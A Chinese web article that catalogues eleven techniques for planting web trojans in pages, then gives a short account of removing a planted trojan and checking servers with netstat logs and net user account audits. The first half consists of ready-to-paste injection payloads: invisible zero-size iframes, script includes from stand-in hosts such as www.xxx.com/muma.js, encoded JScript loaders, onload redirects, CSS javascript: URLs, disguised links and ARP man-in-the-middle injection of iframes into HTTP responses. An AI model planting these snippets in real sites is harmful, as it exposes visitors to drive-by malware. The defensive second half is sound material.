网页木马大全--网马反击战

史上最强悍网页木马大全 -- 网马反击战

网页木马代码大全：

一 : 框架挂马

<iframe src= 地址 width=0 height=0></iframe>

二 :js 文件挂马

首先将以下代码
document.write("<iframe width='0' height='0' src=' 地址 '></iframe>");
保存为 xxx.js ，
则 JS 挂马代码为
<script language=javascript src=xxx.js></script>

三 :js 变形加密

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt 可改成任意后缀
四 :body 挂马

<body onload="window.location=' 地址 ';"></body>

五 : 隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML + '\r\n

<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

六 :css 中挂马

body {
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}

七 :JAJA 挂马

<SCRIPT language=javascript>
window.open (" 地址 ","","toolbar=no,location=no,directories=no,status=no,

menubar=no,scro llbars=no,width=1,height=1");
</script>

八 : 图片伪装

<html>
<iframe src=" 网马地址 " height=0 width=0></iframe>
<img src=" 图片地址 "></center>
</html>

九 : 伪装调用：

<frameset rows="444,0" cols="*">
<frame src=" 打开网页 " framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src=" 网马地址 " frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>

十 : 高级欺骗

<a href=http://www.163.com( 迷惑连接地址，显示这个地址指向木马地址 )

onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url=" 网马地址 ";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,

menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

十一 : 超级网马 ― 通过 arp 欺骗来直接挂马

原理： arp 中间人攻击，实际上相当于做了一次代理。

正常时候 : A---->B ,A 是访问的正常客户 ,B 是要攻击的服务器 ,C 是被我们控制的主机
arp 中间人攻击时候 : A---->C---->B
B---->C---->A
实际上 ,C 在这里做了一次代理的作用

那么 HTTP 请求发过来的时候 ,C 判断下是哪个客户端发过来的包 , 转发给 B, 然后 B 返回 HTTP 响应的时候 , 在 HTTP 响应包中 , 插入一段挂马的代码 , 比如 <iframe>... 之类 , 再将修改过的包返回的正常的客户 A, 就起到了一个挂马的作用 . 在这个过程中 ,B 是没有任何感觉的 , 直接攻击的是正常的客户 A, 如果 A 是管理员或者是目标单位 , 就直接挂上马了。

如何处理网页木马：

1 、找到嵌入的网页木马文件。以下，拿自己的经历说事。找到的文件是 wm.htm

2 、在注册表中查找 wm.htm 。很幸运，找到了。开始顺藤摸瓜 ...

3 、修改键值 wm.htm 为 wm_nnd.htm 。

4 、再次查找 wm.htm 。很不幸，又查到了。说明有服务程序在作怪。嘿嘿，有意外发现。
cain.exe ，据说是密码嗅探器。

5 、修改键值 cain.exe 为 cain_nnd.exe 。

6 、查找 cain.exe ，仍然可以查到。嘻嘻，在预料之中。

7 、怀疑 wm.htm 与 cain.exe 同流合污，背后有服务程序作后台。

8 、快查查看，系统服务程序。在运行 ->msconfig 或直接在命令行使用 net start ，查看可疑程序

9 、发现 temp*.exe （全名记不清了），立马 net stop server 。

10 、快去修改键值 wm.htm 为 wm_nnd.htm ， cain.exe 为 cain_nnd.exe 。

11 、再次查找 wm.htm 或 cain.exe, 没有找到。哈哈，很好。

12 、观察了几天，没再发生挂马的现象。

另外，通过检测网络连接查看服务器是否中了木马或病毒

1 、使用 netstat -an 查看所有和本地计算机建立连接的 IP 。

2 、连接包含四个部分 ――proto( 连接方式 ) 、 local address( 本地连接地址 ) 、 foreign address( 和本地建立连接的地址 ) 、 state( 当前端口状态 ) 。 通过这个命令的详细信息，可以完全监控计算机上的连接，从而达到控制计算机的目的。

3 、手工制作 bat 程序，生成网络连接日志文件供站长分析： bat 文件代码如下

REM 注释：监控的时间
time /t>>Netstat.log
REM 每隔 30 秒，把服务器上通过 tcp 协议通讯的 IP 和端口写入日志文件
Netstat -n -p tcp 30>>Netstat.log

注意：要谨慎使用，这会给服务器带来性能影响。最好，在服务器发生异常，怀疑中木马或病毒时，用来分析网络连接日志。

仅仅这些还不够，说说更严重的：

1 、可恶的攻击者喜欢使用克隆账号的方法来控制你的计算机。 “ 它们 ” 激活一个系统中的默认账户，但这个账户是不经常用的， 然后使用工具把这个账户提升到管理员权限，从表面上看来这个账户还是和原来一样，但是这个克隆的账户却是系统中最大的安全隐患。

2 、赶快检测系统帐户：
a 、在命令行下输入 net user ，查看计算机上有些什么用户。
b 、使用 “net user 用户名 ” 查看这个用户属于什么权限的及登录时间等。
c 、一般除了 Administrator 是 administrators 组的，如果你发现一个系统内置的用户是属于 administrators 组的，
那么别人在你的计算机上克隆账户的概率为 90% 。
d 、是使用 “net user 用户名 /del” 来删掉这个用户，还是修改其它配置，这你说了算。